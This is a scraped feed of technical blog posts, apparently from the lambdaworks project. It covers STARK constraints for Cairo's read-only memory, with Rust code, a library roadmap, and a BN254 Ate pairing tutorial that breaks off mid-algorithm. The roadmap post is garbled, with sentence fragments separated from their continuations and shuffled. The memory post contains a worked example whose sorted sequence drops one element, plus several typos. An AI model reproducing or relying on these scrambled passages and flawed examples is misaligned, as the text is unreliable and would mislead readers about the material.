The hard part is figuring out how to transform these two conditions into equations, which can then be expressed as polynomials.</p>
Like any engineering problem, there are trade-offs: keeping the trace simple can make the constraints more complex, and using more straightforward constraints can require adding more information to the trace.</p>
If we examine the conditions mentioned earlier, it becomes clear that validating them would be easier if the rows were sorted by address. For example, it’s challenging for a human to determine if a sequence like $(7, 5, 12, 4, 5, 11, 9, 10, 4, 4, 11, 7, 8)$ is continuous, but much more straightforward if we sort it: $(4, 4, 5, 5, 7, 7, 8, 9, 10, 11, 11, 12)$.</p>
For this reason, Cairo’s VM adds two additional columns to the trace: the sorted versions of the address and value columns.</p>
For example:</p>
address $(a)$</th> value $(v)$</th> sorted_address $(a’)$</th> sorted_value $(v’)$</th></tr></thead>

1</td> 56</td> 1</td> 56</td></tr>
5</td> 14</td> 1</td> 56</td></tr>
3</td> 25</td> 2</td> 34</td></tr>
3</td> 25</td> 3</td> 25</td></tr>
4</td> 44</td> 3</td> 25</td></tr>
1</td> 56</td> 4</td> 44</td></tr>
2</td> 34</td> 5</td> 14</td></tr>
</tbody></table>
Although this duplicates the trace columns, it significantly simplifies verifying the continuity and read-only properties, as we’ll see next.</p>
However, adding these two columns introduces a new challenge: We need a way to verify that the new columns are permutations of the original ones. We’ll handle this with Permutation Constraints</strong> (spoiler alert: this requires the prover to add another column to the trace).</p>
Thus, by adding these new columns, validating the memory properties boils down to proving these simpler way constraints:</p>
    * **Continuity Constraint**</span></span>
    * **Single Value Constraint**</span></span>
    * **Permutation Constraints**</span></span></code></pre>Constraints</h2>
Continuity Constraint</h3>
Our first constraint will ensure that memory addresses form a continuous range without gaps. For instance, if address 5 appears, addresses 4 and 6 must also appear to maintain continuity.</p>
A valid example of continuous memory:</p>
sorted_addresses $(a’)$</th> sorted_values $(v’)$</th></tr></thead>

…</td> …</td></tr>
100</td> 42</td></tr>
101</td> 17</td></tr>
102</td> 35</td></tr>
103</td> 22</td></tr>
104</td> 88</td></tr>
…</td> …</td></tr>
</tbody></table>
An invalid example:</p>
sorted_addresses $(a’)$</th> sorted_values $(v’)$</th></tr></thead>

…</td> …</td></tr>
100</td> 42</td></tr>
101</td> 17</td></tr>
103</td> 22</td></tr>
104</td> 88</td></tr>
…</td> …</td></tr>
</tbody></table>
Here, address 102 is missing, breaking continuity.</p>
To check continuity, we examine the sorted address column, ensuring that the difference between consecutive addresses is always 0 (if they are the same) or 1 (if they are consecutive). The following Cairo constraint captures this:</p>
$$(a_{i+1}^\prime - a_i^\prime )(a_{i+1}^\prime - a_i^\prime - 1) = 0 \text{ for all } i \in [0,n - 1]$$</p>
Where $a_i^\prime$ represents the address in the $i$-th row of the sorted address column, and $v’_i$ represents the corresponding value.</p>
In this equation:</p>
    * The first factor, $(a'_{i+1} - a'_i)$ equals zero when addresses are the same.</span></span>
    * The second factor, $(a'_{i+1} - a'_i - 1)$ equals zero when addresses differ by 1.</span></span></code></pre>
Since the product must equal zero, the addresses must be identical or differ by exactly 1, ensuring continuity.</p>
Here’s how this is implemented in Rust:

add code</p>
fn evaluate(</span></span>
    &self,</span></span>
    frame: &Frame<F, F>,</span></span>
    transition_evaluations: &mut [FieldElement<F>],</span></span>
    _periodic_values: &[FieldElement<F>],</span></span>
    _rap_challenges: &[FieldElement<F>],</span></span>
) {</span></span>
    transition_evaluations</span></span>
        .get_mut(self.constraint_idx())</span></span>
        .map(|transition_eval| {</span></span>
            let first_step = frame.get_evaluation_step(0);</span></span>
            let second_step = frame.get_evaluation_step(1);</span></span>
</span>
            let a_sorted_0 = first_step.get_main_evaluation_element(0, 2);</span></span>
            let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);</span></span>
</span>
            let res = (a_sorted_1 - a_sorted_0)</span></span>
                * (a_sorted_1 - a_sorted_0 - FieldElement::<F>::one());</span></span>
            *transition_eval = res;</span></span>
        });</span></span>
}</span></span></code></pre>
where:</p>
let first_step = frame.get_evaluation_step(0); </span></span></code></pre>
gives us access to the first row of the trace and</p>
let a_sorted_0 = first_step.get_main_evaluation_element(0, 2); //a'_0</span></span></code></pre>
will give access to the second third column which is element 2</p>
Then the equation looks kike</p>
let res = (a_sorted_1 - a_sorted_0)</span></span>
* (a_sorted_1 - a_sorted_0 - FieldElement::<F>::one());</span></span>
</span>
*transition_eval = res;</span></span></code></pre>Single-Value Constraint</h3>
This constraint ensures that each memory address has a single, consistent value. Even if the same address is accessed multiple times, the value must always remain the same.

A valid example:</p>
Address</th> Value</th></tr></thead>

…</td> …</td></tr>
101</td> 17</td></tr>
101</td> 17</td></tr>
104</td> 88</td></tr>
…</td> …</td></tr>
</tbody></table>
An invalid example:</p>
Address</th> Value</th></tr></thead>

…</td> …</td></tr>
101</td> 17</td></tr>
101</td> 42</td></tr>
102</td> 88</td></tr>
…</td> …</td></tr>
</tbody></table>
Here, address 101 has two different values, violating the constraint.</p>
With an analogous logic to the one used in the continuity constraint, the Cairo paper defines the single-value constraint as:</p>
$$(v_{i+1}^\prime - v_i^\prime )(a_{i+1}^\prime - a_i^\prime - 1) = 0 \quad \text{for all } i \in [0, n - 1]$$</p>
In this equation:</p>
    * The first factor, $(v'_{i+1} - v'_i)$ ensures that the values for identical addresses are the same.</span></span>
    * The second factor, $(a'_{i+1} - a'_i - 1)$ ensures this check only applies to identical addresses.</span></span></code></pre>
Here’s the implementation in Rust</p>
fn evaluate(</span></span>
    &self,</span></span>
    frame: &Frame<F, F>,</span></span>
    transition_evaluations: &mut [FieldElement<F>],</span></span>
    _periodic_values: &[FieldElement<F>],</span></span>
    _rap_challenges: &[FieldElement<F>],</span></span>
) {</span></span>
    transition_evaluations</span></span>
        .get_mut(self.constraint_idx())</span></span>
        .map(|transition_eval| {</span></span>
            let first_step = frame.get_evaluation_step(0);</span></span>
            let second_step = frame.get_evaluation_step(1);</span></span>
</span>
            let a_sorted_0 = first_step.get_main_evaluation_element(0, 2);</span></span>
            let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);</span></span>
            let v_sorted_0 = first_step.get_main_evaluation_element(0, 3);</span></span>
            let v_sorted_1 = second_step.get_main_evaluation_element(0, 3);</span></span>
</span>
            let res = (v_sorted_1 - v_sorted_0)</span></span>
                * (a_sorted_1 - a_sorted_0 - FieldElement::<F>::one());</span></span>
            *transition_eval = res;</span></span>
        });</span></span>
}</span></span></code></pre>
As with the continuity constraint, we extract the relevant rows and elements:</p>
let a_sorted_0 = first_step.get_main_evaluation_element(0, 2); // a'_i</span></span>
let a_sorted_1 = second_step.get_main_evaluation_element(0, 2); // a'_{i+1}</span></span>
let v_sorted_0 = first_step.get_main_evaluation_element(0, 3); // v'_i</span></span>
let v_sorted_1 = second_step.get_main_evaluation_element(0, 3); // v'_{i+1}`</span></span></code></pre>
The evaluation results ensure that if two addresses are equal, their corresponding values are consistent.</p>
Permutation Constraint</h3>
Now that we know that $a’$ and $v’$ represent a continuous read-only memory, we must prove that $a’$ and $v’$ are a permutation of the original $a$ and $v$ columns. We’ll achieve this using an interactive protocol:</p>
First, the verifier sends the prover two random field elements $z, \alpha \in \mathbb{F}$, known as challenges</em>. One detail to remember is that if we work with a small field $\mathbb{F}$, these elements should be sampled from an extension field, so all the following permutation constraints will be over the extension.</p>
Note:</strong> In practice, the protocol is not interactive; instead, the Fiat-Shamir heuristic</a> is used to obtain random values, enabling a non-interactive approach.</p>
secondly, using these challenges, the prover constructs an auxiliary column $p$, which is added to the main trace table. This column is computed as:</p>
$$ \begin{align} p_0 &= \frac {z - (a_0 + \alpha v_0)} {z - (a’_0 + \alpha v’_0)},

\ \newline

p_1 &= \frac {z - (a_0 + \alpha v_0)} {z - (a’_0 + \alpha v’_0)} \cdot \frac {z - (a_1 + \alpha v_1)} {z - (a’_1 + \alpha v’_1)} = p_0 \cdot \frac {z - (a_1 + \alpha v_1)} {z - (a’_1 + \alpha v’_1)},

\ \newline

p_2 &= p_1 \cdot \frac {z - (a_2 + \alpha v_2)} {z - (a’_2 + \alpha v’_2)}. \end{align}$$</p>
Continuing with this procedure we get:</p>
$$p_{i+1} = p_i \cdot \frac {z - (a_{i+1} + \alpha v_{i+1})} {z - (a_{i+1}^\prime + \alpha v_{i+1}^\prime )} \text{ with } i \in {0, \ldots, n - 2}$$</p>
For example, if the main trace table is:</p>
$a$</th> $v$</th> $a’$</th> $v’$</th></tr></thead>

2</td> 10</td> 0</td> 7</td></tr>
0</td> 7</td> 0</td> 7</td></tr>
0</td> 7</td> 1</td> 20</td></tr>
1</td> 20</td> 2</td> 10</td></tr>
</tbody></table>
then the table with the auxiliary column $p$ will look like this:</p>
$a$</th> $v$</th> $a’$</th> $v’$</th> $p$</th></tr></thead>

2</td> 10</td> 0</td> 7</td> $\frac {z - (2 + \alpha 10)} {z - (0 + \alpha 7)}$</td></tr>
0</td> 7</td> 0</td> 7</td> $\frac {z - (2 + \alpha 10)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (0 + \alpha 7)}$</td></tr>
0</td> 7</td> 1</td> 20</td> $\frac {z - (2 + \alpha 10)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (1 + \alpha 20)}$</td></tr>
1</td> 20</td> 2</td> 10</td> $\frac {z - (2 + \alpha 10)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (1 + \alpha 20)} \cdot \frac {z - (1 + \alpha 20)} {z - (2 + \alpha 10)}$</td></tr>
</tbody></table>
Looking at the example, let us observe that the last value in column $p$ gives us the product of all the previous ones. Since the values indeed come from a permutation, each factor in the numerator (originated from $a$ and $v$) must appear once in the denominator (originated from $a’$ and $v’$), canceling each other out and resulting in the entire product equaling $1$. For instance, in the table above, the first numerator (orange) cancels out with the last denominator (orange):</p>
$$\frac { {\style{color: orange} {z - (2 + \alpha 10)}}} {\style{color: cyan} {z - (0 + \alpha 7)}} \cdot \frac { \style{color: magenta} {z - (0 + \alpha 7)}} { \style{color: magenta} {z - (0 + \alpha 7)}} \cdot \frac { \style{color: cyan} {z - (0 + \alpha 7)}} { \style{color: lime} {z - (1 + \alpha 20)}} \cdot \frac { \style{color: lime} {z - (1 + \alpha 20)}} { \style{color: orange} {z - (2 + \alpha 10)}} = 1$$</p>
Generalizing it to any trace with $n$ rows, we get the following last value, called Grand Product</em> :</p>
$$p_{n - 1} = \frac {z - (a_0 + \alpha v_0)} {z - (a_0^\prime + \alpha v_0^\prime )} \cdot \frac {z - (a_1 + \alpha v_1)} {z - (a_1^\prime + \alpha v_1^\prime )} \ldots \frac {z - (a_{n - 1} + \alpha v_{n - 1})} {z - (a_{n - 1}^\prime + \alpha v_{ n - 1 }^\prime )}$$</p>
Then, using the randomness of $z$ and $\alpha$ (and the Schwartz–Zippel Lemma</a>), we know that to prove that $a’$ and $v’$ are a permutation of $a$ and $v$, it suffices to check that:

$$ p_{n-1} = 1$$</p>
In this way, the constraints that guarantee the correct permutation are reduced to two boundary constraints and one transition constraint (you can find them in the Cairo Paper</a>, Section 9.7.2):</p>
1. Initial Value Boundary Constraint:</h4>
$$p_0 = \frac {z - (a_0 + \alpha v_0)} {z - (a_0^\prime + \alpha v_0^\prime )}$$ We check that the first value in the auxiliary column is correct.</p>
2. Final Value Boundary Constraint:</h4>
$$p_{n - 1} = 1$$ We check that the Grand Product equals 1.</p>
In our code, these two Boundary Constraints are located in the boundary_constraints()</code> function of the AIR</code> implementation for ReadOnlyRAP<F></code>. You can see them below, after the comment //Auxiliary boundary constraints</code>:</p>
fn boundary_constraints(</span></span>
    &self,</span></span>
    rap_challenges: &[FieldElement<Self::FieldExtension>],</span></span>
) -> BoundaryConstraints<Self::FieldExtension> {</span></span>
    let a0 = &self.pub_inputs.a0;</span></span>
    let v0 = &self.pub_inputs.v0;</span></span>
    let a_sorted0 = &self.pub_inputs.a_sorted0;</span></span>
    let v_sorted0 = &self.pub_inputs.v_sorted0;</span></span>
    let z = &rap_challenges[0];</span></span>
    let alpha = &rap_challenges[1];</span></span>
</span>
    // Main boundary constraints</span></span>
    let c1 = BoundaryConstraint::new_main(0, 0, a0.clone());</span></span>
    let c2 = BoundaryConstraint::new_main(1, 0, v0.clone());</span></span>
    let c3 = BoundaryConstraint::new_main(2, 0, a_sorted0.clone());</span></span>
    let c4 = BoundaryConstraint::new_main(3, 0, v_sorted0.clone());</span></span>
</span>
    // Auxiliary boundary constraints</span></span>
    let num = z - (a0 + alpha * v0);</span></span>
    let den = z - (a_sorted0 + alpha * v_sorted0);</span></span>
    let p0_value = num / den;</span></span>
</span>
    let c_aux1 = BoundaryConstraint::new_aux(0, 0, p0_value);</span></span>
    let c_aux2 = BoundaryConstraint::new_aux(</span></span>
        0,</span></span>
        self.trace_length - 1,</span></span>
        FieldElement::<Self::FieldExtension>::one(),</span></span>
    );</span></span>
</span>
    BoundaryConstraints::from_constraints(vec![c1, c2, c3, c4, c_aux1, c_aux2])</span></span>
}</span></span></code></pre>
Note that the values of $a$, $a’$, $v$, $v’$ from the first row of the trace must also be known by the verifier to perform the check for the Initial Value constraint. This is a problem we did not have before (the rest of the constraints do not depend on the trace) since the verifier only has access to the commitment of the trace, not its elements. Therefore, this first row must be part of the public input.</p>
3. Permutation Transition Constraint:</h4>
$$(z - (a_{i+1}^\prime + \alpha v_{i + 1}^\prime )) \cdot p_{i+1} - (z - (a_{i+1} + \alpha v_{i+1})) \cdot p_i = 0$$ for all $i \in {0, \ldots, n-2}$.</p>
In this way, we check that each element of $p$ was constructed correctly, with the last element being the Grand Product. In our code, we call this transition constraint PermutationConstraint</code>. When implementing its corresponding evaluate()</code> function (link), the use of this equation can be seen:</p>
fn evaluate(</span></span>
    &self,</span></span>
    frame: &Frame<F, F>,</span></span>
    transition_evaluations: &mut [FieldElement<F>],</span></span>
    _periodic_values: &[FieldElement<F>],</span></span>
    rap_challenges: &[FieldElement<F>],</span></span>
) {</span></span>
    let first_step = frame.get_evaluation_step(0);</span></span>
    let second_step = frame.get_evaluation_step(1);</span></span>
</span>
    let p0 = first_step.get_aux_evaluation_element(0, 0);</span></span>
    let p1 = second_step.get_aux_evaluation_element(0, 0);</span></span>
    let z = &rap_challenges[0];</span></span>
    let alpha = &rap_challenges[1];</span></span>
    let a1 = second_step.get_main_evaluation_element(0, 0);</span></span>
    let v1 = second_step.get_main_evaluation_element(0, 1);</span></span>
    let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);</span></span>
    let v_sorted_1 = second_step.get_main_evaluation_element(0, 3);</span></span>
</span>
    let res = (z - (a_sorted_1 + alpha * v_sorted_1)) * p1</span></span>
        - (z - (a1 + alpha * v1)) * p0;</span></span>
</span>
    transition_evaluations[self.constraint_idx()] = res;</span></span>
}</span></span></code></pre>Summary</h2>
By introducing sorted columns and auxiliary columns, we reduce the problem of validating a continuous read-only memory to proving three simpler constraints:</p>
    * Continuity that ensures all memory addresses form a complete range.</span></span>
    * Single-Value that ensures each address always returns the same value.</span></span>
    * Permutation that ensures the sorted columns are permutations of the original columns.</span></span></code></pre>
These constraints demonstrate the simplicity of STARKs in encoding complex relationships as polynomial equations.</p>


lambdaworks - recap and updated roadmap
Unknown — Tue, 24 Sep 2024 00:00:00 +0000
Introduction</h2>
It has been over a year 
Several advances 
Before jumping into 
          Considering all the 
Roadmap</h2> The following is 
              Over the last year 
lambdaworks has incorporated 
  How we implemented Unknown — Tue,

and a half since we launched lambdaworks</a>, our cryptography library for zero-knowledge (ZK) proofs. We built it focusing on performance, ease of use, support for hardware acceleration, and teaching others how to develop and understand ZK.</p> in ZK in the last year have offered incredible performance gains over previous schemes. For example, circle STARKs has allowed to prove over 620k Poseidon2 hashes per second on consumer-end hardware</a>. Binius allows us to leverage the power of binary fields. Their performance can be greatly increased by using specialized hardware. We have seen new lookup arguments that depend only on the number of lookups used. We also have more efficient hash functions. Last year, we also saw the development and release of general proving zk virtual machines (zkvm). These allow us to write ordinary code (for example, in Rust), execute it on top of the virtual machine, and generate a proof of the execution. This simplifies the development of verifiable applications, abstracting developers from the low-level details of ZK. With the introduction of Aligned</a>, we expect proof verification costs to go consistently down, enabling new verifiable applications built on top of Ethereum. We can predict that ZK will become more and more important in the coming years, and it is necessary, therefore, to have many of the essential tools in our library.</p> the future, let us recap some of the features and numbers of lambdaworks:</p> style="color: #E1E4E8; background-color: #24292E;">    * 493 pull requests merged.</span></span> * 73 contributors.</span></span> * 14 releases.</span></span> * Over 185k downloads.</span></span> * 4 proof systems (STARKs, Cairo, Groth16, Plonk) and two additional example implementations (Pinocchio and BabySNARK).</span></span> * 2 editions of the Sparkling Water Bootcamp in Cryptography, with 30 bootcampers from different countries.</span></span> * [Backend for finite fields](https://github.com/lambdaclass/lambdaworks/tree/main/math/src/field) using Montgomery arithmetic, plus specialized backends for fields with simpler reduction formulae.</span></span> * [Backend for elliptic curve operations](https://github.com/lambdaclass/lambdaworks/tree/main/math/src/elliptic_curve), with different coordinate systems.</span></span> * [Backend for Univariate polynomials](https://github.com/lambdaclass/lambdaworks/tree/main/math/src/polynomial) and Fast Fourier Transform (FFT).</span></span> * Several cryptographic tools, such as hash functions (Poseidon and Pedersen), Merkle trees, KZG commitments, and Fiat-Shamir transformation.</span></span> * Examples and exercises.</span></span></code></pre> recent advances and trends, as well as the experience we got from users and friends, we will incorporate new features and improve existing ones according to the following roadmap.</p> a list of features and updates we want to incorporate into lambdaworks. We may change some or include new ones according to the latest developments in ZK technology:</p> style="color: #E1E4E8; background-color: #24292E;">    * Improve field backends using assembly.</span></span> * Improve field extension backends.</span></span> * Provide new backend implementation for Mersenne primes.</span></span> * Incorporate binary fields.</span></span> * Improve and add features on multilinear and multivariate polynomials.</span></span> * Improve the performance of BLS12-381 and BLS12-377 pairings.</span></span> * Add new hash functions: Rescue, [XHash8 and XHash12](https://eprint.iacr.org/2023/1045.pdf), Poseidon 2.</span></span> * Add [logUp with GKR](https://eprint.iacr.org/2023/1284).</span></span> * Add [Binius](https://eprint.iacr.org/2023/1784).</span></span> * Add [Circle STARKs](https://eprint.iacr.org/2024/278).</span></span> * Provide tools for efficient proof recursion.</span></span> * Provide more documentation, examples, use cases, etc.</span></span> * Add more theoretical background to the library.</span></span> * Finish integration with [Icicle](https://github.com/ingonyama-zk/icicle).</span></span> * Add bindings for Python and other programming languages.</span></span></code></pre>
Summary</h2> and a half, we have seen many new developments in ZK, improving the performance of proof systems while greatly simplifying the development of verifiable applications. The introduction of ZK verification layers will lead to lower verification costs and new applications.</p> many proof systems and different cryptographic primitives to help developers build applications and understand how things work under the hood. We present the new roadmap for the library, hoping to incorporate new proof systems, such as Circle STARKS and Binius while maintaining simplicity and providing clear and straightforward documentation. That way, we hope to bring ZK to developers worldwide, helping them adopt and make this transformative technology available to everybody.</p> the BN254 Ate pairing in lambdaworks
 20 Aug 2024 00:00:00 +0000
Introduction</h2>
The elliptic curve BN254 is currently the only curve with precompiled contracts on Ethereum, making it the most practical choice of a pairing-friendly curve suitable for on-chain zk-SNARK</a> verification with proof systems such as Groth16</a> and PlonK</a>. This work arises from the need to have our own implementation of the BN254 Ate pairing</a>. The idea of this post is to serve as a companion for our implementation, explaining the mathematical theory and algorithms needed to understand it. Several papers and articles present different algorithms for this pairing and its functions, so we thought organizing all that information into a single post would be helpful.</p>
Regarding the mathematical background necessary to follow this reading, we only assume a slight notion of Groups, Finite Fields, and Elliptic Curves. If you do not feel confident in those topics we recommend reading our posts Math Survival Kit for Developers</a> and What Every Developer Needs to Know About Elliptic Curves</a>.</p>
Curve Parameters</h2>
The BN254 (in Lambdaworks BN254Curve</code>) is the Barreto-Naehrig pairing friendly elliptic curve $E$ of the form

$$y^2 = x^3 + 3$$

over a finite field $\mathbb{F_p}$ where:</p>
    * $p = 36x^4 + 36x^3 + 24x^2 + 6x + 1$ is the 254-bit prime number:</span></span>
</span>
p = 21888242871839275222246405745257275088696311157297823662689037894645226208583</span></span>
x = 4965661367192848881</span></span>
</span>
</span>
    * $t = 6x^2 + 1$ is the trace of Frobenius.</span></span>
    * $r = 36x^4 + 36x^3 + 18x^2 + 6x + 1 = p + 1 - t$ is the number of points in the curve $E(\mathbb{F_p })$.</span></span></code></pre>Point Coordinates</h2>
Since we define the elliptic curve as the set of points that satisfy the equation written above, it is natural to think of an element $P \in E(\mathbb{F_p })$ using two coordinates $P = (x, y)$. This representation is called Affine Representation</em> and its coordinates are known as Affine Coordinates</em>. However, many times to optimize the arithmetic, it will be convenient to use what is known as Projective Coordinates</em> , which represent the points with three coordinates $x,$ $y,$ $z$, and is constructed in the following way:

If $P = (x, y)$ is a point in affine coordinates, then $(x, y, 1)$ is its projective representation. And if $P = (x, y, z)$ is a point in projective coordinates, then $(\frac{x}{z}, \frac{y}{z})$ is its affine representation. You’ll see in our implementation that we use both representations depending on what we need in each case, using functions like to_affine()</code>.</p>
There is a third representation that we won’t use, but you may find in some papers, called Jacobian Coordinates</em> : If $P = (x, y, z)$ is a point in Jacobian coordinates, then $(\frac{x}{z}, \frac{y}{z^2 }, z)$ and $(\frac{x}{z^2 }, \frac{y}{z^3 })$ are its projective and affine coordinates respectively.</p>
Field Extension Tower</h2>
A pairing is a map $e: \mathbb{G_1 } \times \mathbb{G_2 } \to \mathbb{G_t }$, and this means that it takes as input two points, each from a group with the same number of points (or order) $r$. This number $r$ must be prime, and to guarantee security, it must be large. Also, for rather technical reasons, these two groups need to be distinct. So, to define a pairing, we need to choose these domains and codomain groups. The group $\mathbb{G_1 }$ will be the curve $E(\mathbb{F_p })$, but to define $\mathbb{G_2 }$ and $\mathbb{G_t }$ we’ll need to extend</em> the field $\mathbb{F_p }$. We are not going to stop to explain in detail what field extensions are and how they are built, so if you are looking for a better understanding, we recommend reading the section Field Extensions</a> from BLS12-381 For the Rest of US</em>. Here, we’ll summarize the basic concepts necessary to understand our implementation and the algorithms we use.</p>
Roughly speaking, our goal is to extend the field $\mathbb{F_p }$ to $\mathbb{F_{ p^{12} }}$, and we will do it in the following way. First, we extend $\mathbb{F_p }$ to $\mathbb{F_{ p^2 }}$ in the same way that the field of real numbers $\mathbb{R}$ is extended to the field of complex numbers $\mathbb{C}$: We define $$\mathbb{F_{ p^2 }} = \mathbb{F_p } [u] / (u^2 + 1).$$ That’s a lot of symbols to process. The good news is that all we need to understand is that $F_{ p^2 }$ is a finite field whose elements are polynomials of degree 1 and variable $u$; that is, they have the form $$a + bu \quad \text{ with } a, b \in \mathbb{F_p }.$$ If we think it as complex numbers, $a$ would be the real part and $b$ the imaginary one. Note that $\mathbb{F_p } \subseteq \mathbb{F_{ p^2 }}$ because we can think of the elements of the left one as elements of the right one with “imaginary part” zero or $b = 0$. So, $\mathbb{F_{ p^2 } }$ is indeed an extension of $\mathbb{F_p }.$

Secondly, we extend $\mathbb{F_{ p^2 }}$ in a similar way defining $$\mathbb{F_{ p^6 }} = \mathbb{F_{ p^2 }} [v] / (v^3 - (9 + u)).$$ In this case, since $v^3 - (9 + u)$ is a polynomial of degree 3, the elements of $\mathbb{F_{ p^6 }}$ will be polynomials of degree 2 and variable $v$ of the form $$a + bv + cv^2 \quad \text{ with } a, b, c \in \mathbb{F_{ p^2 }}.$$ Finally, we extend $\mathbb{F_{ p^6 }}$ defining $$\mathbb{F_{ p^{12} }} = \mathbb{F_{ p^6 }} [w] / (w^2 - v),$$ that is, its elements are again polynomials of degree 1 with variable $w$ of the form $$a + bw \quad \text{ with } a, b \in \mathbb{F_{ p^6 } }.$$

Now, in practice, using lambdaworks, we have two different ways to define an element $f = a + bw \in \mathbb{F_{ p^{12} }}$. We can use new()</code>,</p>
let f = Fp12E::new([a, b])</span></span></code></pre>
or we can use from_coefficients()</code>.</p>
let f = Fp12E::from_coefficients([</span></span>
"a_00", "a_01", "a_10", "a_11", "a_20", "a_21", </span></span>
"b_00", "b_01", "b_10", "b_11", "b_20", "b_21"</span></span>
])</span></span></code></pre>
In the last case we use 12 coefficients to define $f$ because $f = a + bw$, where $a, b \in \mathbb{F_{ p^6 }}$. Then, $$a = \style{color: magenta} {a_0} + \style{color: magenta} {a_1}v + \style{color: magenta}{a_2}v^2 \quad \text{and} \quad b = \style{color: orange}{b_0} + \style{color: orange}{b_1}v + \style{color: orange}{b_2}v^2,

$$ with $a_i, b_i \in \mathbb{F_{ p^2 }}$. And therefore, $$\style{color: magenta}{a_i} = a_{i0} + a_{i1} u \quad \text{and} \quad \style{color: orange}{b_i} = b_{i0} + b_{i1} u,$$ thus reaching the 12 coefficients.</p>
There is another representation of the elements of $\mathbb{F_{ p^{12} }}$ that you could find in papers and algorithms that we used in our implementation. Since $v^3 = 9 + u$ and $w^2 = v$, we have that $w^6 = 9 + u$ and then, $$\mathbb{F_{ p^{12} }} = \mathbb{F_{ p^2 }} [w] / (w^6 - (9 + u)).$$ Again, you don’t have to understand the previous sentence; the important thing is that we can not only represent $f$ as a polynomial of degree 1 and as a polynomial of degree 11 but also as a polynomial of degree 5 using $a_i$ and $b_i$ in the following way:

$$ f = \style{color: magenta}{a_0} + \style{color: orange}{b_0} w + \style{color: magenta}{a_1} w^2 + \style{color: orange}{b_1} w^3 + \style{color: magenta}{a_2} w^4 + \style{color: orange}{b_2} w^5.$$ So every time you see an element of $\mathbb{F_{ p^{12} }}$ represented as a polynomial of degree 5, you will know how to write it as $a + bw$, constructing $a = \style{color: magenta}{a_0} + \style{color: magenta}{a_1}v + \style{color: magenta}{a_2}v^2$ and $b = \style{color: orange}{b_0} + \style{color: orange}{b_1}v + \style{color: orange}{b_2}v^2$ using its coefficients (and vice versa). Having different representations of the same extension field will allow us to apply some optimizations when implementing the pairing (see the section Tower of Extension Fields</a> of Computing the Optimal Ate Pairing Over the BN254 Curve</em>).</p>
This may be a lot of new information, but don’t worry; you don’t need to understand it in detail. When reading the implementation, the idea is to have these equalities at hand to recognize where each variable belongs and how many coefficients it has. In lambdaworks bn_254</code> you’ll find these fields $\mathbb{F_p} ,$ $\mathbb{F_{ p^2 }},$ $\mathbb{F_{ p^6 }}$ and $\mathbb{F_{ p^{12} }}$ (with their operations implemented) as BN254PrimeField</code>, Degree2ExtensionField</code>, Degree6ExtensionField</code> and Degree12ExtensionField</code>.</p>
Twist</h2>
Since doing arithmetic in $\mathbb{F_{ p^{12} }}$ is complicated and inefficient, we will use a twist</em> that is like a coordinate conversion which tranforms our $E(\mathbb{F_{ p^{12} }})$ curve into the following curve $E’$ defined over $\mathbb{F_{ p^2 }}$:

$$y^2 = x^3 + \frac{3}{9 + u} .$$

We will call $b = \frac{3}{9 + u}$ implemented as BN254TwistCurve::b()</code> .</p>
b = 19485874751759354771024239261021720505790618469301721065564631296452457478373 </span></span>
    + 266929791119991161246907387137283842545076965332900288569378510910307636690 </span></span>
    * u</span></span></code></pre>
So, in summary, we will use the following subgroups as inputs for the pairing:

$$\mathbb{G_1} = E (\mathbb{F_p} ),$$

$$\mathbb{G_2} \subseteq E^\prime ( \mathbb{F_{ p^2 }}) .$$

And the output:

$$\mathbb{G_t} \subseteq \mathbb{F_{ p^{12} } }^{\star} ,$$ where $\mathbb{F_{ p^{12} } }^{\star} = \mathbb{F_{ p^{12} } } - {0}$ (the multiplicative group of the field).</p>
Knowing precisely which subgroups $\mathbb{G_2 }$ and $\mathbb{G_t }$ we should take is not relevant to understand our implementation. We will just say for those who have the mathematical background or are interested in going deeper into those topics, that $\mathbb{G_1 }$ and $\mathbb{G_2 }$ are the $r$-torsion groups</em> (i.e. the set of elements of order</em> $r$), while $\mathbb{G_t }$ is the set of the $r$-th roots of unity</em>.</p>
The Pairing</h2>
What is a pairing?</h3>
Let’s better understand it now that we have defined everything necessary to build our pairing. A pairing is a bilinear map $e: \mathbb{G_1 } \times \mathbb{G_2 } \to \mathbb{G_t }$. Bilinear</em> means that it has the following property: For all points $P_1, P_2 \in \mathbb{G_1 }$ and $Q_1, Q_2 \in \mathbb{G_2 }$,

$$\begin{align} e(P_1, Q_1 + Q_2) &= e(P_1, Q_1) \cdot e(P_1, Q_2) \newline

e(P_1 + P_2, Q_1) &= e(P_1, Q_1) \cdot e(P_2, Q_1)\end{align}$$ And from this property, it can be deduced the next one: For all $n, m \in \mathbb{N}$,

$$e(nP, mQ) = e(mQ, nP) = e(P, mQ)^n = e(nP, Q)^m = e(P, Q)^{nm}.$$ Recall that in general, the additive notation $+$ is used to denote the operation of the groups $\mathbb{G_1 }$ and $\mathbb{G_2 }$, and multiplicative notation $\cdot$ is used to denote the operation of $\mathbb{G_t }$.</p>
Ate Pairing Algorithm</h3>
We will use the algorithm of the Ate pairing from this paper</a> (Page 4, Algorithm 1):</p>

Inputs</strong> : $P \in \mathbb{G}_1$ and $Q \in \mathbb{G}_2$

Output:</strong> $f \in \mathbb{G}_t$</p>
    1. define $T \in \mathbb{G}_2$;</span></span>
    2. $T \leftarrow Q$;</span></span>
    3. define $f \in \mathbb{G}_t$;</span></span>
    4. $f \leftarrow 1$;</span></span>
    5. for $i =$ `miller_length` $- 2$ to 0 do</span></span>
    6.      $f \leftarrow f^2$;</span></span>
    7.      $T \leftarrow 2T$;</span></span>
    8.      if `MILLER_CONSTANT`$[i] = -1$ then</span></span>
    9.          $f \leftarrow f \cdot l_{T, -Q}(P)$;</span></span>
    10.          $T \leftarrow T - Q$;</span></span>
    11.      else if `MILLER_CONSTANT`$[i] = 1$ then</span></span>
    12.          $f \leftarrow f \cdot l_{T, Q}(P)$;</span></span>
    13.          $T \leftarrow T + Q$;</span></span>
    14.      end if</span></span>
    15. end for</span></span>
    16. $Q_1 \leftarrow \varphi(Q)$;</span></span>
    17. $f \leftarrow f \cdot l_{T, Q_1 }(P)$;</span></span>
    18. $T \leftarrow T + Q_1$;</span></span>
